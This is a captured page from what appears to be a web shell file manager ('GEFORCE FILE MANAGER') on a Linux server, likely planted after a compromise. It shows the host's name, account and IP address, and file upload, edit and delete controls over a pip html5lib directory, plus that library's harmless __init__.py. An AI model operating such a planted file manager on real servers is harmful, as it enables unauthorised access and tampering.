[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
lib
/
python3.6
/
site-packages
/
pip
/
_vendor
/
html5lib
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 __pycache__
SET
[ DEL ]
📁 _trie
SET
[ DEL ]
📁 filters
SET
[ DEL ]
📁 treeadapters
SET
[ DEL ]
📁 treebuilders
SET
[ DEL ]
📁 treewalkers
SET
[ DEL ]
📄 __init__.py
780 B
SET
[ EDIT ]
|
[ DEL ]
📄 _ihatexml.py
16,705 B
SET
[ EDIT ]
|
[ DEL ]
📄 _inputstream.py
32,532 B
SET
[ EDIT ]
|
[ DEL ]
📄 _tokenizer.py
76,580 B
SET
[ EDIT ]
|
[ DEL ]
📄 _utils.py
4,096 B
SET
[ EDIT ]
|
[ DEL ]
📄 constants.py
83,387 B
SET
[ EDIT ]
|
[ DEL ]
📄 html5parser.py
117,170 B
SET
[ EDIT ]
|
[ DEL ]
📄 serializer.py
14,177 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: __init__.py
""" HTML parsing library based on the WHATWG "HTML5" specification. The parser is designed to be compatible with existing HTML found in the wild and implements well-defined error recovery that is largely compatible with modern desktop web browsers. Example usage: import html5lib f = open("my_document.html") tree = html5lib.parse(f) """ from __future__ import absolute_import, division, unicode_literals from .html5parser import HTMLParser, parse, parseFragment from .treebuilders import getTreeBuilder from .treewalkers import getTreeWalker from .serializer import serialize __all__ = ["HTMLParser", "parse", "parseFragment", "getTreeBuilder", "getTreeWalker", "serialize"] # this has to be at the top level, see how setup.py parses this __version__ = "1.0b10"